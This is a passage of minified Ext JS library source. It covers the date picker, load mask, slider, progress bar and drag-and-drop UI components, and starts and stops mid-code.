var h = new Date(this.mpSelYear, this.mpSelMonth, (this.activeDate || this.value).getDate());
if (h.getMonth() != this.mpSelMonth) {
h = new Date(this.mpSelYear, this.mpSelMonth, 1).getLastDateOfMonth()
}
this.update(h);
this.hideMonthPicker()
} else {
if ((a = c.up("td.x-date-mp-month", 2))) {
this.mpMonths.removeClass("x-date-mp-sel");
a.addClass("x-date-mp-sel");
this.mpSelMonth = a.dom.xmonth
} else {
if ((a = c.up("td.x-date-mp-year", 2))) {
this.mpYears.removeClass("x-date-mp-sel");
a.addClass("x-date-mp-sel");
this.mpSelYear = a.dom.xyear
} else {
if (c.is("a.x-date-mp-prev")) {
this.updateMPYear(this.mpyear - 10)
} else {
if (c.is("a.x-date-mp-next")) {
this.updateMPYear(this.mpyear + 10)
}
}
}
}
}
}
}, onMonthDblClick:function (d, b) {
d.stopEvent();
var c = new Ext.Element(b), a;
if ((a = c.up("td.x-date-mp-month", 2))) {
this.update(new Date(this.mpSelYear, a.dom.xmonth, (this.activeDate || this.value).getDate()));
this.hideMonthPicker()
} else {
if ((a = c.up("td.x-date-mp-year", 2))) {
this.update(new Date(a.dom.xyear, this.mpSelMonth, (this.activeDate || this.value).getDate()));
this.hideMonthPicker()
}
}
}, hideMonthPicker:function (a) {
if (this.monthPicker) {
if (a === true) {
this.monthPicker.hide()
} else {
this.monthPicker.slideOut("t", {duration:0.2})
}
}
}, showPrevMonth:function (a) {
this.update(this.activeDate.add("mo", -1))
}, showNextMonth:function (a) {
this.update(this.activeDate.add("mo", 1))
}, showPrevYear:function () {
this.update(this.activeDate.add("y", -1))
}, showNextYear:function () {
this.update(this.activeDate.add("y", 1))
}, handleMouseWheel:function (a) {
a.stopEvent();
if (!this.disabled) {
var b = a.getWheelDelta();
if (b > 0) {
this.showPrevMonth()
} else {
if (b < 0) {
this.showNextMonth()
}
}
}
}, handleDateClick:function (b, a) {
b.stopEvent();
if (!this.disabled && a.dateValue && !Ext.fly(a.parentNode).hasClass("x-date-disabled")) {
this.cancelFocus = this.focusOnSelect === false;
this.setValue(new Date(a.dateValue));
delete this.cancelFocus;
this.fireEvent("select", this, this.value)
}
}, selectToday:function () {
if (this.todayBtn && !this.todayBtn.disabled) {
this.setValue(new Date().clearTime());
this.fireEvent("select", this, this.value)
}
}, update:function (G, A) {
if (this.rendered) {
var a = this.activeDate, p = this.isVisible();
this.activeDate = G;
if (!A && a && this.el) {
var o = G.getTime();
if (a.getMonth() == G.getMonth() && a.getFullYear() == G.getFullYear()) {
this.cells.removeClass("x-date-selected");
this.cells.each(function (d) {
if (d.dom.firstChild.dateValue == o) {
d.addClass("x-date-selected");
if (p && !this.cancelFocus) {
Ext.fly(d.dom.firstChild).focus(50)
}
return false
}
}, this);
return
}
}
var k = G.getDaysInMonth(), q = G.getFirstDateOfMonth(), g = q.getDay() - this.startDay;
if (g < 0) {
g += 7
}
k += g;
var B = G.add("mo", -1), h = B.getDaysInMonth() - g, e = this.cells.elements, r = this.textNodes, D = (new Date(B.getFullYear(), B.getMonth(), h, this.initHour)), C = new Date().clearTime().getTime(), v = G.clearTime(true).getTime(), u = this.minDate ? this.minDate.clearTime(true) : Number.NEGATIVE_INFINITY, y = this.maxDate ? this.maxDate.clearTime(true) : Number.POSITIVE_INFINITY, F = this.disabledDatesRE, s = this.disabledDatesText, I = this.disabledDays ? this.disabledDays.join("") : false, E = this.disabledDaysText, z = this.format;
if (this.showToday) {
var m = new Date().clearTime(), c = (m < u || m > y || (F && z && F.test(m.dateFormat(z))) || (I && I.indexOf(m.getDay()) != -1));
if (!this.disabled) {
this.todayBtn.setDisabled(c);
this.todayKeyListener[c ? "disable" : "enable"]()
}
}
var l = function (J, d) {
d.title = "";
var i = D.clearTime(true).getTime();
d.firstChild.dateValue = i;
if (i == C) {
d.className += " x-date-today";
d.title = J.todayText
}
if (i == v) {
d.className += " x-date-selected";
if (p) {
Ext.fly(d.firstChild).focus(50)
}
}
if (i < u) {
d.className = " x-date-disabled";
d.title = J.minText;
return
}
if (i > y) {
d.className = " x-date-disabled";
d.title = J.maxText;
return
}
if (I) {
if (I.indexOf(D.getDay()) != -1) {
d.title = E;
d.className = " x-date-disabled"
}
}
if (F && z) {
var w = D.dateFormat(z);
if (F.test(w)) {
d.title = s.replace("%0", w);
d.className = " x-date-disabled"
}
}
};
var x = 0;
for (; x < g; x++) {
r[x].innerHTML = (++h);
D.setDate(D.getDate() + 1);
e[x].className = "x-date-prevday";
l(this, e[x])
}
for (; x < k; x++) {
var b = x - g + 1;
r[x].innerHTML = (b);
D.setDate(D.getDate() + 1);
e[x].className = "x-date-active";
l(this, e[x])
}
var H = 0;
for (; x < 42; x++) {
r[x].innerHTML = (++H);
D.setDate(D.getDate() + 1);
e[x].className = "x-date-nextday";
l(this, e[x])
}
this.mbtn.setText(this.monthNames[G.getMonth()] + " " + G.getFullYear());
if (!this.internalRender) {
var j = this.el.dom.firstChild, n = j.offsetWidth;
this.el.setWidth(n + this.el.getBorderWidth("lr"));
Ext.fly(j).setWidth(n);
this.internalRender = true;
if (Ext.isOpera && !this.secondPass) {
j.rows[0].cells[1].style.width = (n - (j.rows[0].cells[0].offsetWidth + j.rows[0].cells[2].offsetWidth)) + "px";
this.secondPass = true;
this.update.defer(10, this, [G])
}
}
}
}, beforeDestroy:function () {
if (this.rendered) {
Ext.destroy(this.keyNav, this.monthPicker, this.eventEl, this.mbtn, this.nextRepeater, this.prevRepeater, this.cells.el, this.todayBtn);
delete this.textNodes;
delete this.cells.elements
}
}});
Ext.reg("datepicker", Ext.DatePicker);
Ext.LoadMask = function (c, b) {
this.el = Ext.get(c);
Ext.apply(this, b);
if (this.store) {
this.store.on({scope:this, beforeload:this.onBeforeLoad, load:this.onLoad, exception:this.onLoad});
this.removeMask = Ext.value(this.removeMask, false)
} else {
var a = this.el.getUpdater();
a.showLoadIndicator = false;
a.on({scope:this, beforeupdate:this.onBeforeLoad, update:this.onLoad, failure:this.onLoad});
this.removeMask = Ext.value(this.removeMask, true)
}
};
Ext.LoadMask.prototype = {msg:"Loading...", msgCls:"x-mask-loading", disabled:false, disable:function () {
this.disabled = true
}, enable:function () {
this.disabled = false
}, onLoad:function () {
this.el.unmask(this.removeMask)
}, onBeforeLoad:function () {
if (!this.disabled) {
this.el.mask(this.msg, this.msgCls)
}
}, show:function () {
this.onBeforeLoad()
}, hide:function () {
this.onLoad()
}, destroy:function () {
if (this.store) {
this.store.un("beforeload", this.onBeforeLoad, this);
this.store.un("load", this.onLoad, this);
this.store.un("exception", this.onLoad, this)
} else {
var a = this.el.getUpdater();
a.un("beforeupdate", this.onBeforeLoad, this);
a.un("update", this.onLoad, this);
a.un("failure", this.onLoad, this)
}
}};
Ext.slider.Thumb = Ext.extend(Object, {dragging:false, constructor:function (a) {
Ext.apply(this, a || {}, {cls:"x-slider-thumb", constrain:false});
Ext.slider.Thumb.superclass.constructor.call(this, a);
if (this.slider.vertical) {
Ext.apply(this, Ext.slider.Thumb.Vertical)
}
}, render:function () {
this.el = this.slider.innerEl.insertFirst({cls:this.cls});
this.initEvents()
}, enable:function () {
this.disabled = false;
this.el.removeClass(this.slider.disabledClass)
}, disable:function () {
this.disabled = true;
this.el.addClass(this.slider.disabledClass)
}, initEvents:function () {
var a = this.el;
a.addClassOnOver("x-slider-thumb-over");
this.tracker = new Ext.dd.DragTracker({onBeforeStart:this.onBeforeDragStart.createDelegate(this), onStart:this.onDragStart.createDelegate(this), onDrag:this.onDrag.createDelegate(this), onEnd:this.onDragEnd.createDelegate(this), tolerance:3, autoStart:300});
this.tracker.initEl(a)
}, onBeforeDragStart:function (a) {
if (this.disabled) {
return false
} else {
this.slider.promoteThumb(this);
return true
}
}, onDragStart:function (a) {
this.el.addClass("x-slider-thumb-drag");
this.dragging = true;
this.dragStartValue = this.value;
this.slider.fireEvent("dragstart", this.slider, a, this)
}, onDrag:function (g) {
var c = this.slider, b = this.index, d = this.getNewValue();
if (this.constrain) {
var a = c.thumbs[b + 1], h = c.thumbs[b - 1];
if (h != undefined && d <= h.value) {
d = h.value
}
if (a != undefined && d >= a.value) {
d = a.value
}
}
c.setValue(b, d, false);
c.fireEvent("drag", c, g, this)
}, getNewValue:function () {
var a = this.slider, b = a.innerEl.translatePoints(this.tracker.getXY());
return Ext.util.Format.round(a.reverseValue(b.left), a.decimalPrecision)
}, onDragEnd:function (c) {
var a = this.slider, b = this.value;
this.el.removeClass("x-slider-thumb-drag");
this.dragging = false;
a.fireEvent("dragend", a, c);
if (this.dragStartValue != b) {
a.fireEvent("changecomplete", a, b, this)
}
}, destroy:function () {
Ext.destroyMembers(this, "tracker", "el")
}});
Ext.slider.MultiSlider = Ext.extend(Ext.BoxComponent, {vertical:false, minValue:0, maxValue:100, decimalPrecision:0, keyIncrement:1, increment:0, clickRange:[5, 15], clickToChange:true, animate:true, constrainThumbs:true, topThumbZIndex:10000, initComponent:function () {
if (!Ext.isDefined(this.value)) {
this.value = this.minValue
}
this.thumbs = [];
Ext.slider.MultiSlider.superclass.initComponent.call(this);
this.keyIncrement = Math.max(this.increment, this.keyIncrement);
this.addEvents("beforechange", "change", "changecomplete", "dragstart", "drag", "dragend");
if (this.values == undefined || Ext.isEmpty(this.values)) {
this.values = [0]
}
var a = this.values;
for (var b = 0; b < a.length; b++) {
this.addThumb(a[b])
}
if (this.vertical) {
Ext.apply(this, Ext.slider.Vertical)
}
}, addThumb:function (b) {
var a = new Ext.slider.Thumb({value:b, slider:this, index:this.thumbs.length, constrain:this.constrainThumbs});
this.thumbs.push(a);
if (this.rendered) {
a.render()
}
}, promoteThumb:function (d) {
var a = this.thumbs, g, b;
for (var e = 0, c = a.length; e < c; e++) {
b = a[e];
if (b == d) {
g = this.topThumbZIndex
} else {
g = ""
}
b.el.setStyle("zIndex", g)
}
}, onRender:function () {
this.autoEl = {cls:"x-slider " + (this.vertical ? "x-slider-vert" : "x-slider-horz"), cn:{cls:"x-slider-end", cn:{cls:"x-slider-inner", cn:[
{tag:"a", cls:"x-slider-focus", href:"#", tabIndex:"-1", hidefocus:"on"}
]}}};
Ext.slider.MultiSlider.superclass.onRender.apply(this, arguments);
this.endEl = this.el.first();
this.innerEl = this.endEl.first();
this.focusEl = this.innerEl.child(".x-slider-focus");
for (var b = 0; b < this.thumbs.length; b++) {
this.thumbs[b].render()
}
var a = this.innerEl.child(".x-slider-thumb");
this.halfThumb = (this.vertical ? a.getHeight() : a.getWidth()) / 2;
this.initEvents()
}, initEvents:function () {
this.mon(this.el, {scope:this, mousedown:this.onMouseDown, keydown:this.onKeyDown});
this.focusEl.swallowEvent("click", true)
}, onMouseDown:function (d) {
if (this.disabled) {
return
}
var c = false;
for (var b = 0; b < this.thumbs.length; b++) {
c = c || d.target == this.thumbs[b].el.dom
}
if (this.clickToChange && !c) {
var a = this.innerEl.translatePoints(d.getXY());
this.onClickChange(a)
}
this.focus()
}, onClickChange:function (c) {
if (c.top > this.clickRange[0] && c.top < this.clickRange[1]) {
var a = this.getNearest(c, "left"), b = a.index;
this.setValue(b, Ext.util.Format.round(this.reverseValue(c.left), this.decimalPrecision), undefined, true)
}
}, getNearest:function (k, b) {
var m = b == "top" ? this.innerEl.getHeight() - k[b] : k[b], g = this.reverseValue(m), j = (this.maxValue - this.minValue) + 5, e = 0, c = null;
for (var d = 0; d < this.thumbs.length; d++) {
var a = this.thumbs[d], l = a.value, h = Math.abs(l - g);
if (Math.abs(h <= j)) {
c = a;
e = d;
j = h
}
}
return c
}, onKeyDown:function (b) {
if (this.disabled || this.thumbs.length !== 1) {
b.preventDefault();
return
}
var a = b.getKey(), c;
switch (a) {
case b.UP:
case b.RIGHT:
b.stopEvent();
c = b.ctrlKey ? this.maxValue : this.getValue(0) + this.keyIncrement;
this.setValue(0, c, undefined, true);
break;
case b.DOWN:
case b.LEFT:
b.stopEvent();
c = b.ctrlKey ? this.minValue : this.getValue(0) - this.keyIncrement;
this.setValue(0, c, undefined, true);
break;
default:
b.preventDefault()
}
}, doSnap:function (b) {
if (!(this.increment && b)) {
return b
}
var d = b, c = this.increment, a = b % c;
if (a != 0) {
d -= a;
if (a * 2 >= c) {
d += c
} else {
if (a * 2 < -c) {
d -= c
}
}
}
return d.constrain(this.minValue, this.maxValue)
}, afterRender:function () {
Ext.slider.MultiSlider.superclass.afterRender.apply(this, arguments);
for (var c = 0; c < this.thumbs.length; c++) {
var b = this.thumbs[c];
if (b.value !== undefined) {
var a = this.normalizeValue(b.value);
if (a !== b.value) {
this.setValue(c, a, false)
} else {
this.moveThumb(c, this.translateValue(a), false)
}
}
}
}, getRatio:function () {
var a = this.innerEl.getWidth(), b = this.maxValue - this.minValue;
return b == 0 ? a : (a / b)
}, normalizeValue:function (a) {
a = this.doSnap(a);
a = Ext.util.Format.round(a, this.decimalPrecision);
a = a.constrain(this.minValue, this.maxValue);
return a
}, setMinValue:function (e) {
this.minValue = e;
var d = 0, b = this.thumbs, a = b.length, c;
for (; d < a; ++d) {
c = b[d];
c.value = c.value < e ? e : c.value
}
this.syncThumb()
}, setMaxValue:function (e) {
this.maxValue = e;
var d = 0, b = this.thumbs, a = b.length, c;
for (; d < a; ++d) {
c = b[d];
c.value = c.value > e ? e : c.value
}
this.syncThumb()
}, setValue:function (d, c, b, g) {
var a = this.thumbs[d], e = a.el;
c = this.normalizeValue(c);
if (c !== a.value && this.fireEvent("beforechange", this, c, a.value, a) !== false) {
a.value = c;
if (this.rendered) {
this.moveThumb(d, this.translateValue(c), b !== false);
this.fireEvent("change", this, c, a);
if (g) {
this.fireEvent("changecomplete", this, c, a)
}
}
}
}, translateValue:function (a) {
var b = this.getRatio();
return(a * b) - (this.minValue * b) - this.halfThumb
}, reverseValue:function (b) {
var a = this.getRatio();
return(b + (this.minValue * a)) / a
}, moveThumb:function (d, c, b) {
var a = this.thumbs[d].el;
if (!b || this.animate === false) {
a.setLeft(c)
} else {
a.shift({left:c, stopFx:true, duration:0.35})
}
}, focus:function () {
this.focusEl.focus(10)
}, onResize:function (c, e) {
var b = this.thumbs, a = b.length, d = 0;
for (; d < a; ++d) {
b[d].el.stopFx()
}
if (Ext.isNumber(c)) {
this.innerEl.setWidth(c - (this.el.getPadding("l") + this.endEl.getPadding("r")))
}
this.syncThumb();
Ext.slider.MultiSlider.superclass.onResize.apply(this, arguments)
}, onDisable:function () {
Ext.slider.MultiSlider.superclass.onDisable.call(this);
for (var b = 0; b < this.thumbs.length; b++) {
var a = this.thumbs[b], c = a.el;
a.disable();
if (Ext.isIE) {
var d = c.getXY();
c.hide();
this.innerEl.addClass(this.disabledClass).dom.disabled = true;
if (!this.thumbHolder) {
this.thumbHolder = this.endEl.createChild({cls:"x-slider-thumb " + this.disabledClass})
}
this.thumbHolder.show().setXY(d)
}
}
}, onEnable:function () {
Ext.slider.MultiSlider.superclass.onEnable.call(this);
for (var b = 0; b < this.thumbs.length; b++) {
var a = this.thumbs[b], c = a.el;
a.enable();
if (Ext.isIE) {
this.innerEl.removeClass(this.disabledClass).dom.disabled = false;
if (this.thumbHolder) {
this.thumbHolder.hide()
}
c.show();
this.syncThumb()
}
}
}, syncThumb:function () {
if (this.rendered) {
for (var a = 0; a < this.thumbs.length; a++) {
this.moveThumb(a, this.translateValue(this.thumbs[a].value))
}
}
}, getValue:function (a) {
return this.thumbs[a].value
}, getValues:function () {
var a = [];
for (var b = 0; b < this.thumbs.length; b++) {
a.push(this.thumbs[b].value)
}
return a
}, beforeDestroy:function () {
var b = this.thumbs;
for (var c = 0, a = b.length; c < a; ++c) {
b[c].destroy();
b[c] = null
}
Ext.destroyMembers(this, "endEl", "innerEl", "focusEl", "thumbHolder");
Ext.slider.MultiSlider.superclass.beforeDestroy.call(this)
}});
Ext.reg("multislider", Ext.slider.MultiSlider);
Ext.slider.SingleSlider = Ext.extend(Ext.slider.MultiSlider, {constructor:function (a) {
a = a || {};
Ext.applyIf(a, {values:[a.value || 0]});
Ext.slider.SingleSlider.superclass.constructor.call(this, a)
}, getValue:function () {
return Ext.slider.SingleSlider.superclass.getValue.call(this, 0)
}, setValue:function (d, b) {
var c = Ext.toArray(arguments), a = c.length;
if (a == 1 || (a <= 3 && typeof arguments[1] != "number")) {
c.unshift(0)
}
return Ext.slider.SingleSlider.superclass.setValue.apply(this, c)
}, syncThumb:function () {
return Ext.slider.SingleSlider.superclass.syncThumb.apply(this, [0].concat(arguments))
}, getNearest:function () {
return this.thumbs[0]
}});
Ext.Slider = Ext.slider.SingleSlider;
Ext.reg("slider", Ext.slider.SingleSlider);
Ext.slider.Vertical = {onResize:function (a, b) {
this.innerEl.setHeight(b - (this.el.getPadding("t") + this.endEl.getPadding("b")));
this.syncThumb()
}, getRatio:function () {
var b = this.innerEl.getHeight(), a = this.maxValue - this.minValue;
return b / a
}, moveThumb:function (d, c, b) {
var a = this.thumbs[d], e = a.el;
if (!b || this.animate === false) {
e.setBottom(c)
} else {
e.shift({bottom:c, stopFx:true, duration:0.35})
}
}, onClickChange:function (c) {
if (c.left > this.clickRange[0] && c.left < this.clickRange[1]) {
var a = this.getNearest(c, "top"), b = a.index, d = this.minValue + this.reverseValue(this.innerEl.getHeight() - c.top);
this.setValue(b, Ext.util.Format.round(d, this.decimalPrecision), undefined, true)
}
}};
Ext.slider.Thumb.Vertical = {getNewValue:function () {
var b = this.slider, c = b.innerEl, d = c.translatePoints(this.tracker.getXY()), a = c.getHeight() - d.top;
return b.minValue + Ext.util.Format.round(a / b.getRatio(), b.decimalPrecision)
}};
Ext.ProgressBar = Ext.extend(Ext.BoxComponent, {baseCls:"x-progress", animate:false, waitTimer:null, initComponent:function () {
Ext.ProgressBar.superclass.initComponent.call(this);
this.addEvents("update")
}, onRender:function (d, a) {
var c = new Ext.Template('<div class="{cls}-wrap">', '<div class="{cls}-inner">', '<div class="{cls}-bar">', '<div class="{cls}-text">', "<div> </div>", "</div>", "</div>", '<div class="{cls}-text {cls}-text-back">', "<div> </div>", "</div>", "</div>", "</div>");
this.el = a ? c.insertBefore(a, {cls:this.baseCls}, true) : c.append(d, {cls:this.baseCls}, true);
if (this.id) {
this.el.dom.id = this.id
}
var b = this.el.dom.firstChild;
this.progressBar = Ext.get(b.firstChild);
if (this.textEl) {
this.textEl = Ext.get(this.textEl);
delete this.textTopEl
} else {
this.textTopEl = Ext.get(this.progressBar.dom.firstChild);
var e = Ext.get(b.childNodes[1]);
this.textTopEl.setStyle("z-index", 99).addClass("x-hidden");
this.textEl = new Ext.CompositeElement([this.textTopEl.dom.firstChild, e.dom.firstChild]);
this.textEl.setWidth(b.offsetWidth)
}
this.progressBar.setHeight(b.offsetHeight)
}, afterRender:function () {
Ext.ProgressBar.superclass.afterRender.call(this);
if (this.value) {
this.updateProgress(this.value, this.text)
} else {
this.updateText(this.text)
}
}, updateProgress:function (c, d, b) {
this.value = c || 0;
if (d) {
this.updateText(d)
}
if (this.rendered && !this.isDestroyed) {
var a = Math.floor(c * this.el.dom.firstChild.offsetWidth);
this.progressBar.setWidth(a, b === true || (b !== false && this.animate));
if (this.textTopEl) {
this.textTopEl.removeClass("x-hidden").setWidth(a)
}
}
this.fireEvent("update", this, c, d);
return this
}, wait:function (b) {
if (!this.waitTimer) {
var a = this;
b = b || {};
this.updateText(b.text);
this.waitTimer = Ext.TaskMgr.start({run:function (c) {
var d = b.increment || 10;
c -= 1;
this.updateProgress(((((c + d) % d) + 1) * (100 / d)) * 0.01, null, b.animate)
}, interval:b.interval || 1000, duration:b.duration, onStop:function () {
if (b.fn) {
b.fn.apply(b.scope || this)
}
this.reset()
}, scope:a})
}
return this
}, isWaiting:function () {
return this.waitTimer !== null
}, updateText:function (a) {
this.text = a || " ";
if (this.rendered) {
this.textEl.update(this.text)
}
return this
}, syncProgressBar:function () {
if (this.value) {
this.updateProgress(this.value, this.text)
}
return this
}, setSize:function (a, c) {
Ext.ProgressBar.superclass.setSize.call(this, a, c);
if (this.textTopEl) {
var b = this.el.dom.firstChild;
this.textEl.setSize(b.offsetWidth, b.offsetHeight)
}
this.syncProgressBar();
return this
}, reset:function (a) {
this.updateProgress(0);
if (this.textTopEl) {
this.textTopEl.addClass("x-hidden")
}
this.clearTimer();
if (a === true) {
this.hide()
}
return this
}, clearTimer:function () {
if (this.waitTimer) {
this.waitTimer.onStop = null;
Ext.TaskMgr.stop(this.waitTimer);
this.waitTimer = null
}
}, onDestroy:function () {
this.clearTimer();
if (this.rendered) {
if (this.textEl.isComposite) {
this.textEl.clear()
}
Ext.destroyMembers(this, "textEl", "progressBar", "textTopEl")
}
Ext.ProgressBar.superclass.onDestroy.call(this)
}});
Ext.reg("progress", Ext.ProgressBar);
(function () {
var a = Ext.EventManager;
var b = Ext.lib.Dom;
Ext.dd.DragDrop = function (e, c, d) {
if (e) {
this.init(e, c, d)
}
};
Ext.dd.DragDrop.prototype = {id:null, config:null, dragElId:null, handleElId:null, invalidHandleTypes:null, invalidHandleIds:null, invalidHandleClasses:null, startPageX:0, startPageY:0, groups:null, locked:false, lock:function () {
this.locked = true
}, moveOnly:false, unlock:function () {
this.locked = false
}, isTarget:true, padding:null, _domRef:null, __ygDragDrop:true, constrainX:false, constrainY:false, minX:0, maxX:0, minY:0, maxY:0, maintainOffset:false, xTicks:null, yTicks:null, primaryButtonOnly:true, available:false, hasOuterHandles:false, b4StartDrag:function (c, d) {
}, startDrag:function (c, d) {
}, b4Drag:function (c) {
}, onDrag:function (c) {
}, onDragEnter:function (c, d) {
}, b4DragOver:function (c) {
}, onDragOver:function (c, d) {
}, b4DragOut:function (c) {
}, onDragOut:function (c, d) {
}, b4DragDrop:function (c) {
}, onDragDrop:function (c, d) {
}, onInvalidDrop:function (c) {
}, b4EndDrag:function (c) {
}, endDrag:function (c) {
}, b4MouseDown:function (c) {
}, onMouseDown:function (c) {
}, onMouseUp:function (c) {
}, onAvailable:function () {
}, defaultPadding:{left:0, right:0, top:0, bottom:0}, constrainTo:function (j, h, o) {
if (Ext.isNumber(h)) {
h = {left:h, right:h, top:h, bottom:h}
}
h = h || this.defaultPadding;
var l = Ext.get(this.getEl()).getBox(), d = Ext.get(j), n = d.getScroll(), k, e = d.dom;
if (e == document.body) {
k = {x:n.left, y:n.top, width:Ext.lib.Dom.getViewWidth(), height:Ext.lib.Dom.getViewHeight()}
} else {
var m = d.getXY();
k = {x:m[0], y:m[1], width:e.clientWidth, height:e.clientHeight}
}
var i = l.y - k.y, g = l.x - k.x;
this.resetConstraints();
this.setXConstraint(g - (h.left || 0), k.width - g - l.width - (h.right || 0), this.xTickSize);
this.setYConstraint(i - (h.top || 0), k.height - i - l.height - (h.bottom || 0), this.yTickSize)
}, getEl:function () {
if (!this._domRef) {
this._domRef = Ext.getDom(this.id)
}
return this._domRef
}, getDragEl:function () {
return Ext.getDom(this.dragElId)
}, init:function (e, c, d) {
this.initTarget(e, c, d);
a.on(this.id, "mousedown", this.handleMouseDown, this)
}, initTarget:function (e, c, d) {
this.config = d || {};
this.DDM = Ext.dd.DDM;
this.groups = {};
if (typeof e !== "string") {
e = Ext.id(e)
}
this.id = e;
this.addToGroup((c) ? c : "default");
this.handleElId = e;
this.setDragElId(e);
this.invalidHandleTypes = {A:"A"};
this.invalidHandleIds = {};
this.invalidHandleClasses = [];
this.applyConfig();
this.handleOnAvailable()
}, applyConfig:function () {
this.padding = this.config.padding || [0, 0, 0, 0];
this.isTarget = (this.config.isTarget !== false);
this.maintainOffset = (this.config.maintainOffset);
this.primaryButtonOnly = (this.config.primaryButtonOnly !== false)
}, handleOnAvailable:function () {
this.available = true;
this.resetConstraints();
this.onAvailable()
}, setPadding:function (e, c, g, d) {
if (!c && 0 !== c) {
this.padding = [e, e, e, e]
} else {
if (!g && 0 !== g) {
this.padding = [e, c, e, c]
} else {
this.padding = [e, c, g, d]
}
}
}, setInitPosition:function (g, e) {
var h = this.getEl();
if (!this.DDM.verifyEl(h)) {
return
}
var d = g || 0;
var c = e || 0;
var i = b.getXY(h);
this.initPageX = i[0] - d;
this.initPageY = i[1] - c;
this.lastPageX = i[0];
this.lastPageY = i[1];
this.setStartPosition(i)
}, setStartPosition:function (d) {
var c = d || b.getXY(this.getEl());
this.deltaSetXY = null;
this.startPageX = c[0];
this.startPageY = c[1]
}, addToGroup:function (c) {
this.groups[c] = true;
this.DDM.regDragDrop(this, c)
}, removeFromGroup:function (c) {
if (this.groups[c]) {
delete this.groups[c]
}
this.DDM.removeDDFromGroup(this, c)
}, setDragElId:function (c) {
this.dragElId = c
}, setHandleElId:function (c) {
if (typeof c !== "string") {
c = Ext.id(c)
}
this.handleElId = c;
this.DDM.regHandle(this.id, c)
}, setOuterHandleElId:function (c) {
if (typeof c !== "string") {
c = Ext.id(c)
}
a.on(c, "mousedown", this.handleMouseDown, this);
this.setHandleElId(c);
this.hasOuterHandles = true
}, unreg:function () {
a.un(this.id, "mousedown", this.handleMouseDown);
this._domRef = null;
this.DDM._remove(this)
}, destroy:function () {
this.unreg()
}, isLocked:function () {
return(this.DDM.isLocked() || this.locked)
}, handleMouseDown:function (g, d) {
if (this.primaryButtonOnly && g.button != 0) {
return
}
if (this.isLocked()) {
return
}
this.DDM.refreshCache(this.groups);
var c = new Ext.lib.Point(Ext.lib.Event.getPageX(g), Ext.lib.Event.getPageY(g));
if (!this.hasOuterHandles && !this.DDM.isOverTarget(c, this)) {
} else {
if (this.clickValidator(g)) {
this.setStartPosition();
this.b4MouseDown(g);
this.onMouseDown(g);
this.DDM.handleMouseDown(g, this);
this.DDM.stopEvent(g)
} else {
}
}
}, clickValidator:function (d) {
var c = d.getTarget();
return(this.isValidHandleChild(c) && (this.id == this.handleElId || this.DDM.handleWasClicked(c, this.id)))
}, addInvalidHandleType:function (c) {
var d = c.toUpperCase();
this.invalidHandleTypes[d] = d
}, addInvalidHandleId:function (c) {
if (typeof c !== "string") {
c = Ext.id(c)
}
this.invalidHandleIds[c] = c
}, addInvalidHandleClass:function (c) {
this.invalidHandleClasses.push(c)
}, removeInvalidHandleType:function (c) {
var d = c.toUpperCase();
delete this.invalidHandleTypes[d]
}, removeInvalidHandleId:function (c) {
if (typeof c !== "string") {
c = Ext.id(c)
}
delete this.invalidHandleIds[c]
}, removeInvalidHandleClass:function (d) {
for (var e = 0, c = this.invalidHandleClasses.length; e < c; ++e) {
if (this.invalidHandleClasses[e] == d) {
delete this.invalidHandleClasses[e]
}
}
}, isValidHandleChild:function (h) {
var g = true;
var k;
try {
k = h.nodeName.toUpperCase()
} catch (j) {
k = h.nodeName
}
g = g && !this.invalidHandleTypes[k];
g = g && !this.invalidHandleIds[h.id];
for (var d = 0, c = this.invalidHandleClasses.length; g && d < c; ++d) {
g = !Ext.fly(h).hasClass(this.invalidHandleClasses[d])
}
return g
}, setXTicks:function (g, c) {
this.xTicks = [];
this.xTickSize = c;
var e = {};
for (var d = this.initPageX; d >= this.minX; d = d - c) {
if (!e[d]) {
this.xTicks[this.xTicks.length] = d;
e[d] = true
}
}
for (d = this.initPageX; d <= this.maxX; d = d + c) {
if (!e[d]) {
this.xTicks[this.xTicks.length] = d;
e[d] = true
}
}
this.xTicks.sort(this.DDM.numericSort)
}, setYTicks:function (g, c) {
this.yTicks = [];
this.yTickSize = c;
var e = {};
for (var d = this.initPageY; d >= this.minY; d = d - c) {
if (!e[d]) {
this.yTicks[this.yTicks.length] = d;
e[d] = true
}
}
for (d = this.initPageY; d <= this.maxY; d = d + c) {
if (!e[d]) {
this.yTicks[this.yTicks.length] = d;
e[d] = true
}
}
this.yTicks.sort(this.DDM.numericSort)
}, setXConstraint:function (e, d, c) {
this.leftConstraint = e;
this.rightConstraint = d;
this.minX = this.initPageX - e;
this.maxX = this.initPageX + d;
if (c) {
this.setXTicks(this.initPageX, c)
}
this.constrainX = true
}, clearConstraints:function () {
this.constrainX = false;
this.constrainY = false;
this.clearTicks()
}, clearTicks:function () {
this.xTicks = null;
this.yTicks = null;
this.xTickSize = 0;
this.yTickSize = 0
}, setYConstraint:function (c, e, d) {
this.topConstraint = c;
this.bottomConstraint = e;
this.minY = this.initPageY - c;
this.maxY = this.initPageY + e;
if (d) {
this.setYTicks(this.initPageY, d)
}
this.constrainY = true
}, resetConstraints:function () {
if (this.initPageX || this.initPageX === 0) {
var d = (this.maintainOffset) ? this.lastPageX - this.initPageX : 0;
var c = (this.maintainOffset) ? this.lastPageY - this.initPageY : 0;
this.setInitPosition(d, c)
} else {
this.setInitPosition()
}
if (this.constrainX) {
this.setXConstraint(this.leftConstraint, this.rightConstraint, this.xTickSize)
}
if (this.constrainY) {
this.setYConstraint(this.topConstraint, this.bottomConstraint, this.yTickSize)
}
}, getTick:function (k, g) {
if (!g) {
return k
} else {
if (g[0] >= k) {
return g[0]
} else {
for (var d = 0, c = g.length; d < c; ++d) {
var e = d + 1;
if (g[e] && g[e] >= k) {
var j = k - g[d];
var h = g[e] - k;
return(h > j) ? g[d] : g[e]
}
}
return g[g.length - 1]
}
}
}, toString:function () {
return("DragDrop " + this.id)
}}
})();
if (!Ext.dd.DragDropMgr) {
Ext.dd.DragDropMgr = function () {
var a = Ext.EventManager;
return{ids:{}, handleIds:{}, dragCurrent:null, dragOvers:{}, deltaX:0, deltaY:0, preventDefault:true, stopPropagation:true, initialized:false, locked:false, init:function () {
this.initialized = true
}, POINT:0, INTERSECT:1, mode:0, _execOnAll:function (d, c) {
for (var e in this.ids) {
for (var b in this.ids[e]) {
var g = this.ids[e][b];
if (!this.isTypeOfDD(g)) {
continue
}
g[d].apply(g, c)
}
}
}, _onLoad:function () {
this.init();
a.on(document, "mouseup", this.handleMouseUp, this, true);
a.on(document, "mousemove", this.handleMouseMove, this, true);
a.on(window, "unload", this._onUnload, this, true);
a.on(window, "resize", this._onResize, this, true)
}, _onResize:function (b) {
